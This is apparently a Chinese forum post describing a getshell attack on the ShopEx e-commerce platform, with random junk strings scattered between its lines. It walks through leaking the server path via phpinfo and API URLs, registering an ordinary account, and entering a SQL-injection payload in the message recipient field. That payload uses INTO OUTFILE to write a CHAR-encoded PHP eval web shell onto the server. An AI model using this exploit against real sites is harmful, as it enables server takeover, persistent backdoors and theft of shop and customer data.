shopex前台普通用户getshell最新漏洞

admin

第一个：想办法找到目标网站的绝对路径
' l" y. G# n( [0 H
http://www.political-security.com/install/svinfo.php?phpinfo=true

http:/www.political-security.com/core/api/shop_api.php
- ?2 x$ B5 o2 d$ ^" \2 r
/ x) X  x1 [, `) lhttp://www.political-security.co ... api_b2b_2_0_cat.php

+ P; u* ?7 \9 q2 e6 A; chttp://www.political-security.com/core/ap ... b_2_0_goodstype.php
- B4 J. M2 z, f
http://www.political-security.co ... i_b2b_2_0_brand.php
第二个：注册一个普通用户
/ @( }7 t9 [+ }. x, d* |
( N4 V1 x7 n; h8 J2 r% c7 ~http://www.political-security.com/?passport-signup.html

+ Z5 a: A4 J+ u: A6 M' I2 U第三个： 发送消息

! N6 v- @+ Q4 R! I6 r8 f5 whttp://www.political-security.com/?member-send.html
0 z3 B* b6 t* j发送给中填写
antian365.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #